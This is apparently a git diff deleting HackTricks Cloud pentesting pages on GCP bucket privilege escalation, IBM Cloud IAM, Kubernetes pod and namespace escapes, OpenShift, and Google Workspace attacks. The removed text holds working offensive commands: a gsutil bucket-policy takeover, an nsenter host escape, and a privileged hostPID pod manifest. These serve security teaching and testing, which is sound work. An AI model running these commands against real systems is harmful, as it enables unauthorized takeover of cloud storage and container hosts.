-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md deleted file mode 100644 index bd3d71db2..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - Public Buckets Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Buckets Privilege Escalation - -If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. - -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run: - -```bash -gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**. - -## References - -* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md deleted file mode 100644 index caf2dee60..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/README.md +++ /dev/null @@ -1,62 +0,0 @@ -# IBM Cloud Pentesting - -## IBM Cloud Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### What is IBM cloud? (By chatGPT) - -IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. - -When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: - -1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. -2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. -3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. -4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. - -#### Basic Information - -For some basic information about IAM and hierarchi check: - -{% content-ref url="ibm-basic-information.md" %} -[ibm-basic-information.md](ibm-basic-information.md) -{% endcontent-ref %} - -### SSRF - -Learn how you can access the medata endpoint of IBM in the following page: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %} - -## References - -* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md deleted file mode 100644 index 034d4fa02..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md +++ /dev/null @@ -1,99 +0,0 @@ -# IBM - Basic Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Hierarchy - -IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)): - -
- -Recommended way to divide projects: - -
- -## IAM - -
- -### Users - -Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\ -**Permissions** can be granted **directly** to the user with an access policy or via an **access group**. - -### Trusted Profiles - -These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**. - -### Service IDs - -This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\ -**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**. - -### Identity Providers - -External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**. - -### Access Groups - -In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy.\ -An **access group cannot be a member** of another access group. - -### Roles - -A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\ -**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more). - -Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**. - -### Access Policies - -Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\ -When creating the policy you need to choose: - -* The **service** where permissions will be granted -* **Affected resources** -* Service & Platform **access** that will be granted - * These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here. -* **Conditions** (if any) to grant the permissions - -{% hint style="info" %} -To grant access to several services to a user, you can generate several access policies -{% endhint %} - -
- -## References - -* [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises) -* [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/README.md b/pentesting-cloud/kubernetes-security/README.md deleted file mode 100644 index c7b6d358f..000000000 --- a/pentesting-cloud/kubernetes-security/README.md +++ /dev/null @@ -1,106 +0,0 @@ -# Kubernetes Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -### Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -## Hardening Kubernetes / Automatic Tools - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - -## Manual Kubernetes Pentest - -### From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-services/" %} -[pentesting-kubernetes-services](pentesting-kubernetes-services/) -{% endcontent-ref %} - -### Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -### Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="kubernetes-namespace-escalation.md" %} -[kubernetes-namespace-escalation.md](kubernetes-namespace-escalation.md) -{% endcontent-ref %} - -### From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="kubernetes-pivoting-to-clouds.md" %} -[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md deleted file mode 100644 index f913d5ccf..000000000 --- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +++ /dev/null @@ -1,63 +0,0 @@ -# Pod Escape Privileges - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md deleted file mode 100644 index de5c06b84..000000000 --- a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md +++ /dev/null @@ -1,59 +0,0 @@ -# Kubernetes Namespace Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -### Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/openshift-pentesting/README.md b/pentesting-cloud/openshift-pentesting/README.md deleted file mode 100644 index 8be91bbad..000000000 --- a/pentesting-cloud/openshift-pentesting/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift Pentesting - -## Basic Information - -{% content-ref url="openshift-basic-information.md" %} -[openshift-basic-information.md](openshift-basic-information.md) -{% endcontent-ref %} - -## Security Context Constraints - -{% content-ref url="openshift-scc.md" %} -[openshift-scc.md](openshift-scc.md) -{% endcontent-ref %} - -## Privilege Escalation - -{% content-ref url="openshift-privilege-escalation/" %} -[openshift-privilege-escalation](openshift-privilege-escalation/) -{% endcontent-ref %} diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md deleted file mode 100644 index 7e5040e3f..000000000 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift - Privilege Escalation - -## Missing Service Account - -{% content-ref url="openshift-missing-service-account.md" %} -[openshift-missing-service-account.md](openshift-missing-service-account.md) -{% endcontent-ref %} - -## Tekton - -{% content-ref url="openshift-tekton.md" %} -[openshift-tekton.md](openshift-tekton.md) -{% endcontent-ref %} - -## SCC Bypass - -{% content-ref url="openshift-scc-bypass.md" %} -[openshift-scc-bypass.md](openshift-scc-bypass.md) -{% endcontent-ref %} diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md deleted file mode 100644 index f974d179b..000000000 --- a/pentesting-cloud/workspace-security/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# GWS - Workspace Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Entry Points - -### Google Platforms and OAuth Apps Phishing - -Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -### Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address. - -## Post-Exploitation - -If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges: - -{% content-ref url="gws-post-exploitation.md" %} -[gws-post-exploitation.md](gws-post-exploitation.md) -{% endcontent-ref %} - -### GWS <-->GCP Pivoting - -Read more about the different techniques to pivot between GWS and GCP in: - -{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/) -{% endcontent-ref %} - -## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID) - -* **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC. -* **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. -* **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -{% content-ref url="gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/" %} -[gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid](gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/) -{% endcontent-ref %} - -## Persistence - -If you have compromised some credentials or the session of the user check these options to maintain persistence over it: - -{% content-ref url="gws-persistence.md" %} -[gws-persistence.md](gws-persistence.md) -{% endcontent-ref %} - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Removed malicious synced smartphones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md deleted file mode 100644 index 09b6ffa5b..000000000 --- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md +++ /dev/null @@ -1,273 +0,0 @@ -# GWS - App Scripts - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Scripts - -App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\ -They can also be set to be **executed every certain time** by the owner of the App Script (Persistence). - -### Create App Script - -There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**: - -
- -Create a container-bound project from Google Docs, Sheets, or Slides - -1. Open a Docs document, a Sheets spreadsheet, or Slides presentation. -2. Click **Extensions** > **Google Apps Script**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project - -To create a standalone project from Apps Script: - -1. Go to [`script.google.com`](https://script.google.com/). -2. Click add **New Project**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project from Google Drive - -1. Open [Google Drive](https://drive.google.com/). -2. Click **New** > **More** > **Google Apps Script**. - -
- -
- -Create a container-bound project from Google Forms - -1. Open a form in Google Forms. -2. Click More more\_vert > **Script editor**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
